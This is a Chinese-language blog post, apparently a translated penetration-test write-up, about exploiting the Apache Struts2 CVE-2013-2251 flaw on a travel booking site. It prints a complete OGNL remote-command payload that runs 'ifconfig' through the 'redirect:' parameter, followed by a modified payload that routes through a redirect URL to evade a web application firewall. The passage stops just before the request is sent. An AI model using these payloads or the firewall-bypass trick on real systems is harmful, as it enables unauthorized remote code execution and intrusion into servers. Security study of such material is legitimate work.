一次获取RCE以及提权到root权限的渗透过程

发布于2025年5月16日2025年7月19日作者:cve-20

一次获取RCE以及提权到root权限的渗透过程

迪哥讲事 2025-05-16 12:30

本文是关于
Apache struts2 CVE-2013-2251
是由于导致执行远程命令的影响而被高度利用的漏洞。简而言之，
通过操纵以“action:”/”redirect:”/”redirectAction:”为前缀的参数引入的漏洞，允许在使用<Struts 2.3.15作为框架的Java Web应用程序中执行远程命令。

现在，当这个漏洞以病毒式疯狂传播时，主要的应用防火墙厂商开始更新它们的规则引擎和检测技术，以防止它发生。但是作者不仅能够绕过防火墙并获得远程代码执行，还能够通过利用内核漏洞来提权到以root用户身份获取服务器权限。

当作者在测试旅行预订网站时，是

因为为了找到应用程序是否运行在易受攻击的Apache Struts框架上的漏洞利用，只需检查以下易受攻击的参数
–
“action, redirect,redirectAction”和正确的有效攻击负载，通过
google
找到利用poc的博客（必须构建一个
OGNL
表达式），
http://blog.opensecurityresearch.com/2014/02/attacking-struts-with-cve-2013-2251.html
，下面是用于运行命令
“ifconfig”
的有效负载。

redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{‘ ifconfig’})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}

但正如预料的那样，它被应用防火墙阻止了，并将重定向到一个
bot
机器页面。

当这样的事情发生在作者身上时，正如前面指出的那样，知道哪些参数易受攻击，其中之一是在上述请求中使用的
“redirect”
参数。
“redirect
”，是的，你觉得它是正确的，让我们尝试在这里重定向，只是把它重定向到http：//www.goal.com

正如你所看到的那样，作者得到了
302
重定向到位置http://www.goal.com ，所以之前的
ifconfig
命令有效载荷被阻止了，这个重定向方法，给了作者一个绕过防火墙的思路，所以，将上面的有效负载进行修改如下：

redirect:http://www.goal.com/${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{‘ ifconfig’})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}

并发起请求：